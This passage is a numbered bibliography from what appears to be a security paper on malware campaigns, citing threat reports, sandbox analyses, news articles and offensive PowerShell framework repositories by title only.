[3] J. An, “Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang,” Cisco Talos Blog, Dec. 11, 2023.

[4] Joe Security LLC, “Automated Malware Analysis Report for file.exe - Generated by Joe Sandbox,” Joe Security LLC.

[5] “Joe Sandbox Analysis.”

[6]“Empire/Invoke-TokenManipulation.ps1 at master · EmpireProject/Empire,” GitHub.

[7] “GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework,” GitHub.

[8] “GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security,” GitHub.

[9]“PoshC2,” Nettitude Labs, Jun. 20, 2016.

[10]“GitHub - darkoperator/Posh-SecMod: PowerShell Module with Security cmdlets for security work,” GitHub.

[11] Joe Security LLC, “Automated Malware Analysis Report for Mixed In Key 8.pkg - Generated by Joe Sandbox,” Joe Security LLC.

[12]Joe Security LLC, “Automated Malware Analysis Report for y8g2Ga0Gas - Generated by Joe Sandbox,” Joe Security LLC.

[13] Joe Security LLC, “Automated Malware Analysis Report for 1rNsYj4HBT - Generated by Joe Sandbox,” Joe Security LLC.

[14]“People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection,” Cybersecurity and Infrastructure Security Agency CISA.

[15]Joe Security LLC, “Automated Malware Analysis Report for on.cmd - Generated by Joe Sandbox,” Joe Security LLC.

[16]Joe Security LLC, “Automated Malware Analysis Report for - Generated by Joe Sandbox,” Joe Security LLC.

[17] “Malware Analysis Report.”

[18] B. Toulas, “Fake Linux vulnerability exploit drops data-stealing malware,” BleepingComputer, Jul. 13, 2023.

[19]B. Toulas, “Exploit released for critical Fortinet RCE flaw, patch now,” BleepingComputer, Feb. 21, 2023.

[20]B. Toulas, “New malware infects business routers for data theft, surveillance,” BleepingComputer, Mar. 06, 2023.

[21] S. Gatlan, “DarkGate malware spreads through compromised Skype accounts,” BleepingComputer, Oct. 14, 2023.

[22]Security Joes, “Operation Ice Breaker Targets The Gam(bl)ing Industry Right Before It’s Biggest Gathering,” Security Joes, Feb. 01, 2023.

[23] “New TACTICAL OCTOPUS Attack Campaign Targets US Entities with Malware Bundled in Tax-Themed Documents,” Securonix, Mar. 30, 2023.

[24]“PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer,”, Jul. 11, 2023.

[25]B. Toulas, “Spain warns of LockBit Locker ransomware phishing attacks,” BleepingComputer, Aug. 28, 2023.

[26] B. Toulas, “Hackers use Binance Smart Chain contracts to store malicious scripts,” BleepingComputer, Oct. 13, 2023.

[27] B. Toulas, “New Web injections campaign steals banking data from 50,000 people,” BleepingComputer, Dec. 19, 2023.

[28] L. Abrams, “US, UK warn of govt hackers using custom malware on Cisco routers,” BleepingComputer, Apr. 18, 2023.

[29] B. Toulas, “Google Home speakers allowed hackers to snoop on conversations,” BleepingComputer, Dec. 29, 2022.

[30] B. Toulas, “Chinese APT15 hackers resurface with new Graphican malware,” BleepingComputer, Jun. 21, 2023.

[31] S. Gatlan, “New S1deload Stealer malware hijacks Youtube, Facebook accounts,” BleepingComputer, Feb. 22, 2023.